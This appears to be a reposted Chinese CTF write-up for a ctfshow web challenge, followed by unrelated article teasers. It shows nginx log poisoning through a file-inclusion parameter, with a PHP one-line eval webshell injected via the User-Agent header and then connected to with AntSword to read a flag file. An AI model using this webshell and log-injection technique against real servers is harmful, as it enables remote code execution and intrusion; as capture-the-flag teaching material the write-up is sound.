根据发回的响应包可以确定这题使用的是 nginx 服务器:
看看访问日志先,?url=/var/log/nginx/access.log:
尝试使用日志包含写入一句话木马,往 User-Agent 字段传入一句话木马 <?php @eval($_POST['web4']);?>
传入后的日志增加一条记录:
使用中国蚁剑连接日志文件,在 /var/www/flag.txt 目录找到 flag 内容。
参考
ctfshow_WriteUp | _萌新-Guanz-博客园
test_web4_2
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/745457.html
如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!相关文章
test_web4_1
web4
题目分析
和上一题显示的页面一样,用同样的方法尝试注入:出现报错:看来这题相比上一题增加了过滤。使用 shell_exec 同理:换个思路,尝试使用一句话木马连接服务器后台。
插片式远程 IO模块:Profinet总线耦合器博途配置
XD9000是Profinet总线耦合器,单个耦合器最多可扩展32个I/O模块!它们可以将输入/输出信号传送到远离控制中心的设备。Profinet总线耦合器是一种常用的设备,帮助连接IO模块和总线。XD9000是Profinet总线耦合器,单个耦合器最多可扩展32个I/O模块!它们可以将输入/输出信号传送…
frps内网穿透搭建http域名连接
起因是最近抽到了一台小鸡
1H512M2G,当然,安装完系统后就仅剩512M的存储空间了所以就打算搭建一个比较轻量的
我这里正好也没有公网ipv4,就搭建了frps(注意s -> server;c -> client下同)
`frps配置
`frpc配置
serverAddr = "ip地址"
serverPort = 10001
[…
河南萌新联赛2024第(一)场
个人感觉质量很不错的一套题,难度适中很适合我这种小白去做。不过由于在下能力有限,本文只会讲我通过的那些题。在难度上AHIK--FG--CB,接下来我会按这个难度顺序讲解。
A 造数我们模拟一下它从n到0的过程,要让n变小,肯定是在n>2的时候不断向下除以2,我们假设一个数4到9…
李沐动手学深度学习V2-chapter_linear-networks
李沐动手学深度学习V2
文章内容说明
本文主要是自己学习过程中的随手笔记,需要自取
课程参考B站:https://space.bilibili.com/1567748478?spm_id_from=333.788.0.0
课件等信息原视频简介中有线性回归从零实现
导入包
%matplotlib inline
import random
import torch
from d2…
【THM】Mr Robot CTF练习
脚本小子是这样的,黑客只要写POC就可以,可是脚本小子要考虑的事情就多了。【THM】Mr Robot CTF练习
基于电视剧《黑客军团》,你能得到这个靶机的根权限吗?你能得到这台黑客军团风格靶机的根权限吗?这是一个适用于初学者/中级用户的虚拟机。机器上有 3 个隐藏的钥匙,你能找…
gitee入门_如何上传文件
前提条件:
1,已经安装完git相关环境
2,在gitee上已经创建完仓库
1,初始化本地仓库
在本地新建一个文件夹,点击鼠标右键,选择git bash在打开后输入代码:
git init 2,同步文件
打开gitee,选择自己的仓库,复制输入:
git remote add origin 此处粘贴然后再执行上述图片…
EtherCAT总线耦合器:在Codesys里进行IO组态案例
远程IO模块:EtherCAT总线耦合器XD7000实现工业自动化中主控制器与设备间实时数据交换,支持监控和控制功能。配置涉及多个步骤,确保数据准确性和实时性。其高速通信、无缝连接和广泛适应性为机器人和自动化设备行业提供可靠技术支持。EtherCAT总线耦合器:在Codesys和Twincat…
膜片钳的基本概念—电压钳原理详解
什么是电压钳在膜片钳技术出现之前,其实就存在电压钳技术,他的原理是通过向细胞内注射变化的电流,抵消离子通道开放时所产生的离子流,从而将细胞膜电位固定在某一数值,即钳制电压,记录电流。通俗点就是,将细胞上的电压保持为一个我们设定的电压值,同时记录跨膜电流。作…